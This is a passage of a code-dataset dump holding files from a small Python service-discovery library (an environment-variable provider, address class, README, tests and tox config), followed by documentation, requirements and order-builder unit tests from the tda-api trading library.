"text": "# -*- coding: utf-8 -*-\nfrom __future__ import print_function, absolute_import, division\nfrom service_discovery.providers.base_provider import BaseServiceProvider\nfrom service_discovery.providers.base_provider import InjectableServiceProvider\n\nfrom service_discovery.service_address import ServiceAddress\nimport os\n\n\nclass EnvServiceProvider(BaseServiceProvider, InjectableServiceProvider):\n \"\"\"Provide services from the SERVICE_INJECT_MAP environment variable\n\n The map must look like:\n <service_name>?host:port,host:port...%<service_name>?host:port,host:port...\n\n For example:\n SERVICE_INJECT_MAP=query_lm?search2-devc:14902%federator?localhost:31337\n\n In addition if asked for a service not in the map SERVICE_%name% will be\n looked up, expecting the format:\n SERVICE_%name%=host:port,host:port...\n \"\"\"\n def __init__(self, env=None):\n self.env = env\n if self.env is None:\n self.env = os.environ\n\n self.services = {}\n injection_map = self.env.get('SERVICE_INJECT_MAP', '')\n\n if injection_map:\n injections = injection_map.split('%')\n for injection in injections:\n service_name, service_host_ports = injection.split('?')\n addrs = EnvServiceProvider.__parse_service_injection(\n service_name, service_host_ports\n )\n self.services[service_name] = addrs\n\n @staticmethod\n def __parse_service_injection(service_name, service_host_ports):\n if service_host_ports:\n return [\n ServiceAddress.from_host_port(\n service_name, host_port, provenance=__name__\n ) for host_port in service_host_ports.split(',')\n ]\n return []\n\n def inject(self, service_address):\n self.services[service_address.service_name] = [service_address]\n return True\n\n def provide_all_service_addresses(self, service_name):\n service_addresses = self.services.get(service_name)\n if service_addresses is None:\n service_host_ports = self.env.get(\n 'SERVICE_{name}'.format(name=service_name.upper()), ''\n )\n service_addresses = EnvServiceProvider.__parse_service_injection(\n service_name, service_host_ports\n )\n self.services[service_name] = service_addresses\n return service_addresses\n\n def provide_service_address(self, service_name):\n service_addresses = self.provide_all_service_addresses(service_name)\n if service_addresses:\n return service_addresses[0]\n return None\n"
},
{
"alpha_fraction": 0.8095238208770752,
"alphanum_fraction": 0.8253968358039856,
"avg_line_length": 62,
"blob_id": "0b8cf98036d66af14200341fc51674e0f0c8df5b",
"content_id": "ef33e481321a01bbd46105d7f0b5e6dc784d5a5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 63,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 1,
"path": "/service_discovery/__init__.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "from .service_discovery import ServiceDiscovery # flake8: noqa\n"
},
{
"alpha_fraction": 0.6893890500068665,
"alphanum_fraction": 0.7028939127922058,
"avg_line_length": 33.55555725097656,
"blob_id": "e25bd66047e2b8024e10c8e3240c94fb93ca9467",
"content_id": "bf394fee2458e49da21b95a02f88007aa2bef383",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1555,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 45,
"path": "/tests/providers/env_service_provider_test.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "from service_discovery.providers.env_provider import EnvServiceProvider\nfrom service_discovery.service_address import ServiceAddress\n\n\ndef test_injection_map():\n mock_environment = {\n 'SERVICE_INJECT_MAP':\n 'test_service?test_host:12%test_service2?localhost:1337'\n }\n\n env_services = EnvServiceProvider(env=mock_environment)\n\n for service in ['test_service', 'test_service2']:\n assert len(env_services.provide_all_service_addresses(service)) == 1\n\n test_service = env_services.provide_service_address('test_service')\n assert test_service == ServiceAddress('test_service', 'test_host', 12)\n\n\ndef test_service_override():\n mock_environment = {\n 'SERVICE_INJECT_MAP': 'test_service?test_host:17'\n }\n\n env_services = EnvServiceProvider(env=mock_environment)\n assert len(env_services.provide_all_service_addresses('no_service')) == 0\n\n new_mock_environment = {\n 'SERVICE_INJECT_MAP': 'test_service?test_host:17',\n 'SERVICE_NO_SERVICE': 'test_host:11'\n }\n env_services = EnvServiceProvider(env=new_mock_environment)\n no_service = env_services.provide_service_address('no_service')\n assert no_service == ServiceAddress('no_service', 'test_host', 11)\n\n\ndef test_no_env():\n mock_environment = {}\n\n env_services = EnvServiceProvider(env=mock_environment)\n\n test_service = env_services.provide_all_service_addresses('test_service')\n assert len(test_service) == 0\n test_service = env_services.provide_service_address('test_service')\n assert test_service is None\n"
},
{
"alpha_fraction": 0.5770833492279053,
"alphanum_fraction": 0.5822916626930237,
"avg_line_length": 29.967741012573242,
"blob_id": "0ccfe698bb80cda085d86a1ae5999f119c9ac23c",
"content_id": "110678ef4e194d9886b9a6d179e7752e3f850412",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 960,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 31,
"path": "/service_discovery/service_address.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import print_function, absolute_import, division\n\n\nclass ServiceAddress(object):\n\n @classmethod\n def from_host_port(cls, service_name, host_port, provenance='Unknown'):\n host, port = host_port.split(':')\n return cls(service_name, host, port, provenance)\n\n def __init__(self, service_name, host, port, provenance='Unknown'):\n self.service_name = service_name\n self.host = host\n self.port = int(port)\n self.provenance = provenance\n\n def get_host_port(self):\n return '{host}:{port}'.format(host=self.host, port=self.port)\n\n def __eq__(self, other):\n return (\n other.service_name == self.service_name and\n other.host == self.host and\n other.port == self.port\n )\n\n def __repr__(self):\n return '[{0}] @ {1}:{2} ({3})'.format(\n self.service_name, self.host, self.port, self.provenance\n )\n"
},
{
"alpha_fraction": 0.7948718070983887,
"alphanum_fraction": 0.8205128312110901,
"avg_line_length": 8.75,
"blob_id": "43e274d065a45316e9da903646e0259974a7d028",
"content_id": "871af0a8d7b51aa052df3b8ac1e7cb38d663a6b9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 39,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 4,
"path": "/requirements-testing.txt",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "-r requirements.txt\npytest\nflake8\nmock\n"
},
{
"alpha_fraction": 0.7777777910232544,
"alphanum_fraction": 0.7777777910232544,
"avg_line_length": 18,
"blob_id": "a3f8f7e2ede185165bcb2978f157d71167358cbe",
"content_id": "31f1e36afdd1f4cab88af6865e7efbb554dcf4e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 171,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 9,
"path": "/service_discovery/errors.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function, absolute_import, division\n\n\nclass ServiceDiscoveryError(Exception):\n pass\n\n\nclass ServiceDiscoveryInitError(Exception):\n pass\n"
},
{
"alpha_fraction": 0.7340205907821655,
"alphanum_fraction": 0.7360824942588806,
"avg_line_length": 25.454545974731445,
"blob_id": "56a09ca6999ed767ba7ed6d20022c02014654ad7",
"content_id": "e0cecc7fafa553e3d6bcc1d31e2094b1d63ab79c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1455,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 55,
"path": "/README.md",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "Service Discovery\n=================\n\n*Please don't rely on this yet, this is a WIP code base.*\n\nThis library is intended to provide an abstraction on services running\nin a SOA. This is *not* a service discovery system, for that see \n[smartstack](http://nerds.airbnb.com/smartstack-service-discovery-cloud/),\n[consul](https://consul.io/),\n[curator](http://curator.apache.org/curator-x-discovery/index.html),\n[eureka](https://github.com/Netflix/eureka), or your other favorite discovery\nsystem.\n\nThe idea would be that no matter which service discovery system your org chooses\nto roll out you can use this service discovery interface to access them, and\nthen create provider plugins for your favorite discovery system.\n\nIt provides two main functions:\n\n1. A fixed interface for services to call as part of service discovery\n\n2. A plug and play provider system for providing #1\n\nInterface\n---------\nAt its core service discovery is about an interface:\n\nA few objects:\n\nServiceDiscovery\n----------------\n\n``init()``: Initialized the service discovery subsystem\n\n``inject_service(address)``:\n\n``get_service_address(service_name)``\n\n``get_all_service_addresses(service_name)``\n\nServiceAddress\n--------------\n``service_name``\n\n``host``\n\n``port``\n\n``get_host_port``\n\nServiceProvider\n---------------\nThese are the mechanisms by which we return addresses to the ServiceDiscovery\nclass, they implement a similar interface to ServiceDiscovery just without\ninjection.\n"
},
{
"alpha_fraction": 0.5559144020080566,
"alphanum_fraction": 0.5571255683898926,
"avg_line_length": 29.207317352294922,
"blob_id": "de4eeffaa5c26985efb01223825e710f5198bd18",
"content_id": "bfb0e632fe19b27fb6cf4008ca3203fea9031ec8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2477,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 82,
"path": "/service_discovery/service_discovery.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom __future__ import print_function, absolute_import, division\nfrom service_discovery.providers.env_provider import EnvServiceProvider\nfrom service_discovery.errors import (\n ServiceDiscoveryInitError, ServiceDiscoveryError\n)\n\nimport threading\n\n\nclass ServiceDiscovery(object):\n PROVIDERS = [(EnvServiceProvider, ())]\n INJECTOR_PROVIDER_INDEX = 0\n\n __initialized = False\n __lock = threading.RLock()\n\n @classmethod\n def is_initialized(cls):\n return cls.__initialized\n\n @classmethod\n def init(cls):\n try:\n with cls.__lock:\n cls.providers = [\n provider(*args) for provider, args in cls.PROVIDERS\n ]\n cls.__initialized = True\n except Exception as exp:\n cls.__initialized = False\n raise ServiceDiscoveryInitError(exp)\n\n @classmethod\n def reset(cls):\n try:\n with cls.__lock:\n cls.__initialized = False\n except Exception as exp:\n cls.__initialized = False\n raise exp\n\n @classmethod\n def inject_service(cls, service_address):\n try:\n with cls.__lock:\n if not cls.__initialized:\n cls.init()\n cls.providers[cls.INJECTOR_PROVIDER_INDEX].inject(\n service_address\n )\n except Exception as exp:\n raise ServiceDiscoveryError(exp)\n\n @classmethod\n def _query_providers(cls, service_name, method_name):\n try:\n with cls.__lock:\n if not cls.__initialized:\n cls.init()\n for provider in cls.providers:\n provider_response = getattr(provider, method_name)(\n service_name\n )\n print(provider_response)\n if provider_response:\n return provider_response\n raise Exception('Could not find {0}'.format(service_name))\n except Exception as exp:\n raise ServiceDiscoveryError(exp)\n\n @classmethod\n def get_all_service_addresses(cls, service_name):\n return cls._query_providers(\n service_name, 'provide_all_service_addresses'\n )\n\n @classmethod\n def get_service_address(cls, service_name):\n return cls._query_providers(\n service_name, 'provide_service_address'\n )\n"
},
{
"alpha_fraction": 0.7044642567634583,
"alphanum_fraction": 0.7080357074737549,
"avg_line_length": 35.129032135009766,
"blob_id": "1bf45c6b2a632d65cbe5eca73b52e8eda98cd3e4",
"content_id": "2f096d3c5a45dd774c453b75d862299019d943e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1120,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 31,
"path": "/tests/test_service_discovery.py",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "from service_discovery import ServiceDiscovery\nfrom service_discovery.service_address import ServiceAddress\nfrom service_discovery.errors import ServiceDiscoveryError\nimport pytest\n\n\nclass TestServiceDiscovery(object):\n def setup_method(self, method):\n ServiceDiscovery.reset()\n\n def test_init(self):\n assert not ServiceDiscovery.is_initialized()\n ServiceDiscovery.init()\n assert ServiceDiscovery.is_initialized()\n\n def test_injection(self):\n assert not ServiceDiscovery.is_initialized()\n mock_service = ServiceAddress(\n 'test_service', 'localhost', 1337, 'tests'\n )\n ServiceDiscovery.inject_service(mock_service)\n\n addresses = ServiceDiscovery.get_all_service_addresses('test_service')\n address = ServiceDiscovery.get_service_address('test_service')\n assert [mock_service] == addresses\n assert mock_service == address\n\n def test_errors(self):\n assert not ServiceDiscovery.is_initialized()\n with pytest.raises(ServiceDiscoveryError):\n ServiceDiscovery.get_service_address('nopenopenope')\n"
},
{
"alpha_fraction": 0.6822429895401001,
"alphanum_fraction": 0.6985981464385986,
"avg_line_length": 21.526315689086914,
"blob_id": "09a833cdf7e02e075ad71d9a54e4544e1eaa804e",
"content_id": "60e54b0797237c1d29e65af6397c1044a3e4048a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 428,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 19,
"path": "/tox.ini",
"repo_name": "jolynch/service_discovery",
"src_encoding": "UTF-8",
"text": "[tox]\nenvlist = py26,py27,py34,coverage\n\n[testenv]\ndeps =\n -rrequirements-testing.txt\ncommands =\n py.test {posargs:tests}\n flake8 service_discovery tests\n\n[testenv:coverage]\ndeps =\n -rrequirements-testing.txt\n coverage\ncommands =\n coverage erase\n coverage run -m py.test {posargs:tests}\n coverage combine\n coverage report --omit=.tox/*,tests/*,packages/*,/usr/share/pyshared/*,/usr/lib/pymodules/* -m\n"
}
] | 14 |
woneata/oldatm
|
https://github.com/woneata/oldatm
|
4f99de45478bb6bb095090323c64ad1ab631aaf5
|
b7fc13bf7114d4b1c7df4a139f57ef7e07f6999a
|
a8fe204d8d582b5f14c5dd3b50b4b5a9b46b2677
|
refs/heads/main
| 2023-04-22T11:42:16.606868 | 2021-04-07T12:46:29 | 2021-04-07T12:46:29 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5333616733551025,
"alphanum_fraction": 0.5448364019393921,
"avg_line_length": 19.409090042114258,
"blob_id": "629b146f8dd10b5fed4a96c3878dc4b0f6df2504",
"content_id": "a8c80c332f076f59b956f8179c17cc7026d74b39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2353,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 110,
"path": "/auth.py",
"repo_name": "woneata/oldatm",
"src_encoding": "UTF-8",
"text": "#register\r\n#-first name, last name, password, email\r\n#-generate user id\r\n\r\n#login\r\n# - account number, email and password\r\n\r\n#bank operations\r\n\r\n#Initializing the system\r\n\r\nimport random\r\ndatabase ={} #dictionary\r\n\r\ndef init():\r\n \r\n print(\"Welcome to Bank PHP\")\r\n\r\n \r\n haveAccount = int(input(\"Do you have an account with us: 1 (yes) 2 (no)? \\n\"))\r\n\r\n if(haveAccount == 1):\r\n \r\n login()\r\n elif(haveAccount == 2):\r\n \r\n print(register())\r\n else: \r\n print(\"You have selected an invalid option\")\r\n init()\r\n\r\ndef login():\r\n print(\"******* Login *******\")\r\n\r\n accountNumberFromUser = int(input(\"What is your account number? \\n\"))\r\n password = input(\"What is your password? \\n\")\r\n\r\n for accountNumber, userDetails in database.items():\r\n if(userDetails[3] == password):\r\n operations(userDetails)\r\n print('Invalid account or password')\r\n login()\r\n\r\n \r\n\r\ndef register():\r\n print('****** Register ******')\r\n\r\n email = input(\"What is your email address? \\n\")\r\n first_name = input(\"What is your first name? \\n\")\r\n last_name = input (\"What is your last name? \\n\")\r\n password = input('Create a password? \\n')\r\n\r\n accountNumber = generateAccountNumber()\r\n\r\n database[accountNumber] = [ first_name, last_name, email, password ]\r\n\r\n print(\"Your account has been created\")\r\n print(\" == ==== ===== ===== ===\")\r\n print('Your account number is: %d' % accountNumber)\r\n print('Make sure you keep it safe')\r\n print(\" == ==== ===== ===== ===\")\r\n\r\n login()\r\n\r\n \r\n\r\ndef operations(user):\r\n print('Welcome %s %s' %( user[0], user[1] ) )\r\n \r\n selectedOption = int(input(\"What would you like to do? (1) deposit (2) deposit (3) Logout (4) Exit \\n\"))\r\n\r\n if(selectedOption == 1):\r\n \r\n deposit()\r\n elif(selectedOption == 2):\r\n \r\n withdrawal()\r\n elif(selectedOption == 3):\r\n logout()\r\n \r\n elif(selectedOption == 4):\r\n \r\n exit()\r\n else:\r\n print(\"Invalid option selected\")\r\n operations(user)\r\n\r\n\r\ndef withdrawal():\r\n print('Withdrawal')\r\n\r\ndef deposit():\r\n print('Deposit')\r\n\r\ndef generateAccountNumber():\r\n\r\n return random.randrange(111111,999999)\r\n\r\ndef logout():\r\n login()\r\n\r\n\r\n\r\n\r\n\r\n\r\n#### ACTUAL BANKING SYSTEM\r\n\r\ninit()"
}
] | 1 |
cRAN-cg/todoman
|
https://github.com/cRAN-cg/todoman
|
91aa25fcd32c42d2ff27cab432bee256d58eec7b
|
3238c73114a3718a302419a526442d56c3011252
|
c492888f24db5ee28f726a5e2434be3b5935264d
|
refs/heads/master
| 2021-01-22T22:28:15.113373 | 2017-05-29T21:03:22 | 2017-05-29T21:03:22 | 92,775,061 | 0 | 0 | null | 2017-05-29T21:00:10 | 2017-05-04T23:15:14 | 2017-05-27T20:36:40 | null |
[
{
"alpha_fraction": 0.7214533090591431,
"alphanum_fraction": 0.7491349577903748,
"avg_line_length": 16.515151977539062,
"blob_id": "17a487371ebf5503aafabec98e09b6eecc976693",
"content_id": "6e3d1a5d2f2846f87f65fdd66792b6504afda159",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 578,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 33,
"path": "/tox.ini",
"repo_name": "cRAN-cg/todoman",
"src_encoding": "UTF-8",
"text": "[tox]\nenvlist = py33, py34, py35, py36, flake8, docs\nskip_missing_interpreters = True\n\n[testenv]\ndeps =\n -rrequirements.txt\n -rrequirements-dev.txt\ncommands = py.test --cov todoman\nsetenv =\n PYTHONPATH = {toxinidir}\npassenv = CI\n\n[testenv:flake8]\nbasepython = python3\nskip_install = True\ndeps =\n flake8\n flake8-import-order\ncommands = flake8\n\n[testenv:docs]\nbasepython = python3\nwhitelist_externals =\n make\ncommands =\n pip install -rrequirements-docs.txt\n make -C docs html\n\n[flake8]\nexclude=.tox,build\napplication-import-names=todoman,tests\nimport-order-style=smarkets\n"
},
{
"alpha_fraction": 0.5660640001296997,
"alphanum_fraction": 0.5785813927650452,
"avg_line_length": 20.147058486938477,
"blob_id": "276a50297141f61c22848183c4957b6eab49639d",
"content_id": "0da42a6a87c6508d4853660eb6035d0a89c84caa",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 719,
"license_type": "permissive",
"max_line_length": 79,
"num_lines": 34,
"path": "/todoman/exceptions.py",
"repo_name": "cRAN-cg/todoman",
"src_encoding": "UTF-8",
"text": "class TodomanException(Exception):\n \"\"\"\n Base class for all our exceptions.\n\n Should not be raised directly.\n \"\"\"\n pass\n\n\nclass NoSuchTodo(TodomanException):\n EXIT_CODE = 20\n\n def __str__(self):\n return 'No todo with id {}.'.format(self.args[0])\n\n\nclass ReadOnlyTodo(TodomanException):\n EXIT_CODE = 21\n\n def __str__(self):\n return (\n 'Todo is in read-only mode because there are multiple todos in {}.'\n .format(self.args[0])\n )\n\n\nclass NoListsFound(TodomanException):\n EXIT_CODE = 22\n\n def __str__(self):\n return (\n 'No lists found matching {}, create a directory for a new list.'\n .format(self.args[0])\n )\n"
},
{
"alpha_fraction": 0.5909090638160706,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 21,
"blob_id": "1c4afb86627b86e911152d429e559e780f8b23ed",
"content_id": "48d172b17e944934508f613a21e397c4ecf584f0",
"detected_licenses": [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"ISC"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 22,
"license_type": "permissive",
"max_line_length": 21,
"num_lines": 1,
"path": "/requirements-docs.txt",
"repo_name": "cRAN-cg/todoman",
"src_encoding": "UTF-8",
"text": "sphinx_autorun>=1.0.0\n"
}
] | 3 |
berzoidberg/tda-api
|
https://github.com/berzoidberg/tda-api
|
94d4e87107abcbd1248a3b9cedd22697c716783b
|
02979f9d60c20af845592a074585c72d783e30be
|
de2dc6de53dc6c1b702d45be06753713d7193e3f
|
refs/heads/master
| 2022-12-10T12:07:41.577518 | 2020-09-13T04:24:29 | 2020-09-13T04:24:29 | 294,240,679 | 1 | 1 |
MIT
| 2020-09-09T22:10:20 | 2020-09-09T05:24:03 | 2020-09-06T01:38:02 | null |
[
{
"alpha_fraction": 0.7146946787834167,
"alphanum_fraction": 0.7153307795524597,
"avg_line_length": 35.13793182373047,
"blob_id": "92fba96e23337480264cec7c07414a95f35bb09b",
"content_id": "e97f4d033e63cdd7c49f108eaf6e52147df925f8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 3144,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 87,
"path": "/docs/help.rst",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": ".. highlight:: python\n.. py:module:: tda.debug\n\n.. _help:\n\n============\nGetting Help\n============\n\n``tda-api`` is not perfect. Features are missing, documentation may be out of \ndate, and it almost certainly contains bugs. If you think of a way in which\n``tda-api`` can be improved, we're more than happy to hear it. \n\nThis page outlines the process for getting help if you found a bug. If you need \ngeneral help using ``tda-api``, or just want to chat with other people \ninterested in developing trading strategies, you can \n`join our discord <https://discord.gg/M3vjtHj>`__.\n\nIf you still want to submit an issue, we ask that you follow a few guidelines to \nmake both our lives easier:\n\n\n--------------\nEnable Logging\n--------------\n\nBehind the scenes, ``tda-api`` performs diagnostic logging of its activity using \nPython's `logging <https://docs.python.org/3/library/logging.html>`__ module. \nYou can enable this debug information by telling the root logger to print these \nmessages:\n\n.. code-block:: python\n\n import logging\n logging.getLogger('').addHandler(logging.StreamHandler())\n\nSometimes, this additional logging is enough to help you debug. Before you ask \nfor help, carefully read through your logs to see if there's anything there that \nhelps you.\n\n\n-------------------------------\nGather Logs For Your Bug Report\n-------------------------------\n\nIf you still can't figure out what's going wrong, ``tda-api`` has special \nfunctionality for gathering and preparing logs for filing issues. It works by \ncapturing ``tda-api``'s logs, anonymizing them, and then dumping them to the \nconsole when the program exits. You can enable this by calling this method \n**before doing anything else in your application**:\n\n.. code-block:: python\n\n tda.debug.enable_bug_report_logging()\n\nThis method will redact the logs to scrub them of common secrets, like account \nIDs, tokens, access keys, etc. However, this redaction is not guaranteed to be \nperfect, and it is your responsibility to make sure they are clean before you \nask for help.\n\nWhen filing a issue, please upload the logs along with your description. **If\nyou do not include logs with your issue, your issue may be closed**. \n\nFor completeness, here is this method's documentation:\n\n.. automethod:: tda.debug.enable_bug_report_logging\n\n\n------------------\nSubmit Your Ticket\n------------------\n\nYou are now ready to write your bug. Before you do, be warned that your issue\nmay be be closed if:\n\n * It does not include code. The first thing we do when we receive your issue is \n we try to reproduce your failure. We can't do that if you don't show us your\n code.\n * It does not include logs. It's very difficult to debug problems without logs.\n * Logs are not adequately redacted. This is for your own protection.\n * Logs are copy-pasted into the issue message field. Please write them to a \n file and attach them to your issue.\n * You do not follow the issue template. We're not *super* strict about this \n one, but you should at least include all the information it asks for.\n\nYou can file an issue on our `GitHub page <https://github.com/alexgolec/tda-api/\nissues>`__.\n"
},
{
"alpha_fraction": 0.8717948794364929,
"alphanum_fraction": 0.8717948794364929,
"avg_line_length": 9.636363983154297,
"blob_id": "6da7ffe48ac52aeb45d9505b3f47155c21d10005",
"content_id": "acaaa7dfef02db9fda0ca4ce624af684b69a555a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 117,
"license_type": "permissive",
"max_line_length": 17,
"num_lines": 11,
"path": "/requirements.txt",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": "asynctest\ncolorama\ncoverage\nrequests_oauthlib\npython-dateutil\npytest\npytz\nselenium\nsphinx_rtd_theme\ntwine\nwebsockets\n"
},
{
"alpha_fraction": 0.4878534972667694,
"alphanum_fraction": 0.500436007976532,
"avg_line_length": 33.01271057128906,
"blob_id": "7ea4fc2fc2e617547326afecbc3d48e110de1efd",
"content_id": "a506a21b9f94d766e7ebf45990b0cf711f2799bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8027,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 236,
"path": "/tests/test_orders.py",
"repo_name": "berzoidberg/tda-api",
"src_encoding": "UTF-8",
"text": "import unittest\n\nfrom tda.orders.common import *\nfrom tda.orders.equities import *\nfrom .utils import has_diff, no_duplicates\nfrom . import test_utils\n\n\nclass EquityOrderBuilderTest(unittest.TestCase):\n\n def valid_order(self):\n 'Returns a valid MARKET order'\n return EquityOrderBuilder('AAPL', 10) \\\n .set_instruction(EquityOrderBuilder.Instruction.BUY) \\\n .set_order_type(EquityOrderBuilder.OrderType.MARKET) \\\n .set_duration(Duration.DAY) \\\n .set_session(Session.NORMAL)\n\n @no_duplicates\n def test_successful_construction_market(self):\n order = EquityOrderBuilder('AAPL', 10) \\\n .set_instruction(EquityOrderBuilder.Instruction.BUY) \\\n .set_order_type(EquityOrderBuilder.OrderType.MARKET) \\\n .set_duration(Duration.DAY) \\\n .set_session(Session.NORMAL) \\\n .build()\n\n self.assertTrue(('orderType', 'MARKET') in order.items())\n self.assertTrue(('session', 'NORMAL') in order.items())\n self.assertTrue(('duration', 'DAY') in order.items())\n self.assertTrue(\n ('instruction', 'BUY')\n in order['orderLegCollection'][0].items())\n self.assertTrue(\n ('quantity', 10)\n in order['orderLegCollection'][0].items())\n self.assertTrue(\n ('symbol', 'AAPL')\n in order['orderLegCollection'][0]['instrument'].items())\n\n @no_duplicates\n def test_successful_construction_limit(self):\n order = EquityOrderBuilder('AAPL', 10) \\\n .set_instruction(EquityOrderBuilder.Instruction.BUY) \\\n .set_order_type(EquityOrderBuilder.OrderType.LIMIT) \\\n .set_price(100.5) \\\n .set_duration(Duration.DAY) \\\n .set_session(Session.NORMAL) \\\n .build()\n\n self.assertTrue(('orderType', 'LIMIT') in order.items())\n self.assertTrue(('session', 'NORMAL') in order.items())\n self.assertTrue(('duration', 'DAY') in order.items())\n self.assertTrue(('price', 100.5) in order.items())\n self.assertTrue(\n ('instruction', 'BUY')\n in order['orderLegCollection'][0].items())\n self.assertTrue(\n ('quantity', 10)\n in order['orderLegCollection'][0].items())\n self.assertTrue(\n ('symbol', 'AAPL')\n in order['orderLegCollection'][0]['instrument'].items())\n\n @no_duplicates\n def test_limit_requires_price(self):\n order = EquityOrderBuilder('AAPL', 10) \\\n .set_instruction(EquityOrderBuilder.Instruction.BUY) \\\n .set_order_type(EquityOrderBuilder.OrderType.LIMIT) \\\n .set_duration(Duration.DAY) \\\n .set_session(Session.NORMAL)\n\n with self.assertRaises(\n InvalidOrderException, msg='price must be set'):\n order.build()\n\n order.set_price(100)\n order.build()\n\n def field_required(self, name):\n order = self.valid_order()\n setattr(order, name, None)\n with self.assertRaises(\n InvalidOrderException, msg='{} must be set'.format(name)):\n order.build()\n\n @no_duplicates\n def test_order_type_required(self):\n self.field_required('order_type')\n\n @no_duplicates\n def test_session_required(self):\n self.field_required('session')\n\n @no_duplicates\n def test_duration_required(self):\n self.field_required('duration')\n\n @no_duplicates\n def test_instruction_required(self):\n self.field_required('instruction')\n\n\nclass BuilderTemplates(unittest.TestCase):\n\n def test_equity_buy_market(self):\n self.assertFalse(has_diff({\n 'orderType': 'MARKET',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'BUY',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_buy_market('GOOG', 10).build()))\n\n def test_equity_buy_limit(self):\n self.assertFalse(has_diff({\n 'orderType': 'LIMIT',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'price': '199.99',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'BUY',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_buy_limit('GOOG', 10, 199.99).build()))\n\n def test_equity_sell_market(self):\n self.assertFalse(has_diff({\n 'orderType': 'MARKET',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'SELL',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_sell_market('GOOG', 10).build()))\n\n def test_equity_sell_limit(self):\n self.assertFalse(has_diff({\n 'orderType': 'LIMIT',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'price': '199.99',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'SELL',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_sell_limit('GOOG', 10, 199.99).build()))\n\n def test_equity_sell_short_market(self):\n self.assertFalse(has_diff({\n 'orderType': 'MARKET',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'SELL_SHORT',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_sell_short_market('GOOG', 10).build()))\n\n def test_equity_sell_short_limit(self):\n self.assertFalse(has_diff({\n 'orderType': 'LIMIT',\n 'session': 'NORMAL',\n 'duration': 'DAY',\n 'price': '199.99',\n 'orderStrategyType': 'SINGLE',\n 'orderLegCollection': [{\n 'instruction': 'SELL_SHORT',\n 'quantity': 10,\n 'instrument': {\n 'symbol': 'GOOG',\n 'assetType': 'EQUITY',\n }\n }]\n }, equity_sell_short_limit('GOOG', 10, 